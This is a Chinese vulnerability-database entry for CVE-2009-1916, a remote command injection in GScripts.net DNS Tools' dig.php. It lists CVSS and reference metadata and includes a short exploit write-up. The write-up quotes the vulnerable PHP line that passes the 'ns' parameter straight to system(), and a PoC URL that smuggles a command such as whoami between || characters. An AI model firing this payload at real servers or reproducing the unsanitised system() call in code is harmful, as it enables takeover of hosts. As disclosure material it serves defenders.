GScripts.net DNS Tools 'dig.php' 远程指令执行漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1182650 漏洞类型 操作系统命令注入
发布时间 2009-06-04 更新时间 2009-06-04
CVE编号 CVE-2009-1916 CNNVD-ID CNNVD-200906-065
漏洞平台 N/A CVSS评分 10.0
|漏洞来源
https://www.securityfocus.com/bid/79454
https://cxsecurity.com/issue/WLB-2009060103
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200906-065
|漏洞详情
GScripts.netDNSTools的dig.php允许远程攻击者可以借助ns参数中的外壳元字符,执行任意指令。
|漏洞EXP
[+] DNS Tools (PHP Digger) Remote Command Execution
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] www.h4cky0u.org

[+] Remote Command Execution

 - Vulnerable code in dig.php

------------------------------------------
$ns  = $_GET['ns'];

 system ("dig @$ns $host $query_type");
------------------------------------------

We can execute commands via "ns" variable.Just use || before and after
the command.

 PoC :

  http://127.0.0.1/dig.php?ns=||COMMAND HERE||&host=mortal-team.net&query_type=NS&status=digging

 Example :

  http://127.0.0.1/dig.php?ns=||whoami||&host=mortal-team.net&query_type=NS&status=digging


|受影响的产品
Gscripts Dns Tools 0
|参考资料

来源:BID
名称:34559
链接:http://www.securityfocus.com/bid/34559
来源:MILW0RM
名称:8454
链接:http://www.milw0rm.com/exploits/8454
来源:SECUNIA
名称:34773
链接:http://secunia.com/advisories/34773